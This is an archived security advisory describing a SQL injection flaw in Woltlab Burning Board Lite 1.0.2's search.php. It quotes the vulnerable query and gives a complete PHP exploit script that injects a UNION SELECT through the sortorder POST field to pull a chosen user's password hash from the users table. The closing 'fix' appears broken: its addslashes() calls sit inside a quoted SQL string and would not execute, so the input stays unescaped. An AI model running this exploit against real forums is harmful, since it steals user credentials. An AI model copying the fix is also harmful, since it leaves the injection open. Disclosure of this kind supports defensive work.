Computer Security

Security Advisory: Woltlab Burning Board 1.0.2 SQL-Injection Vulnerability
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  Logaholic Web Analytics Software

  Jupiter Cms Multiple Vulnerabilities

  [waraxe-2007-SA#060] - Sensitive info disclosure in CuteNews <= 1.4.5

  [ISecAuditors Security Advisories] Tikiwiki CMS is vulnerable to path traversal attack

From:nbbn_(at)_gmx.net <nbbn_(at)_gmx.net>
Date:21.12.2007
Subject:Woltlab Burning Board 1.0.2 SQL-Injection Vulnerability

In Woltlab Burning Board Lite(1.0.2) is a SQL-Injection Vulnerability in file:
search.php :
Line: 510-515

if(!$savepostids) eval("error(\"".$tpl-
>get("error_searchnoresult").
"\");");
 $result=$db->query_first("SELECT searchid FROM bb".$n."_searchs WHERE
postids='$savepostids' AND showposts='$_POST[showposts]' AND
sortby='$_POST[sortby]' AND sortorder='$_POST[sortorder]' AND
userid='$wbbuserdata[userid]' AND ipaddress='$REMOTE_ADDR'");
 if($result['searchid']) {
  header("Location:
search.php?searchid=$result[searchid]&sid=$session[hash]");
  exit();
 }

There no addslashes()  in $_POST[showposts], $_POST[sortby].
$_POST[sortorder].


== Exploit ==
<?php
$host = $argv[1];
$path = $argv[2];
$searchstring = $argv[3];
$userid = $argv[4];
If ($argc <= 4)
{
echo "Usage: filename.php [host] [path] [searchstring] [user-id] \n Examples:
\n php filename.php localhost /wbblite/search.php Computer 1\n php
filename.php localhost /search.php Board 1\n";
die;
}
$sqlinjecting
= "searchstring=$searchstring&searchuser=&name_exactly=1&boardids%
5B%5D=*&topiconly=0&showposts=0&searchdate=0&beforeafter=afte
r&sortby=lastpost&sortorder=%27%20UNION%20SELECT%20passwo
rd%20FROM%20bb1_users%20WHERE%20userid=$userid%20/*&send=
send&sid=&submit=Suchen";
$con = fsockopen($host, 80);
 echo("==Woltlab Burning Board LITE SQL-Injection Exploit founded and coded
by NBBN. \n\n\n");
 sleep(1);
 fputs($con, "POST $path HTTP/1.1\n");
 fputs($con, "Host: $host\n");
 fputs($con, "Content-type: application/x-www-form-urlencoded\n");
 fputs($con, "Content-length: ". strlen($sqlinjecting) ."\n");
 fputs($con, "Connection: close\n\n");
 fputs($con, "$sqlinjecting\n");
 
 while(!feof($con)) {
     $res .= fgets($con, 128);
 }
 echo("Well done...\n");
 fclose($con);

 echo $res;
echo "The password-hash is in search.php?searchid=[Hash]\n";
$the_hash =  substr($res,strpos($res,'searchid=')+9,32);
echo "Hash: $the_hash\n\n";
?>


== Fix ==

if(!$savepostids) eval("error(\"".$tpl-
>get("error_searchnoresult").
"\");");
 $result=$db->query_first("SELECT searchid FROM bb".$n."_searchs WHERE
postids='$savepostids' AND showposts='.addslashes($_POST[showposts]).' AND
sortby='.addslashes($_POST[sortby]).' AND
sortorder='.addslashes($_POST[sortorder]).' AND userid='$wbbuserdata[userid]'
AND ipaddress='$REMOTE_ADDR'");
 if($result['searchid']) {
  header("Location:
search.php?searchid=$result[searchid]&sid=$session[hash]");
  exit();
 }

About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 


Rating@Mail.ru
test server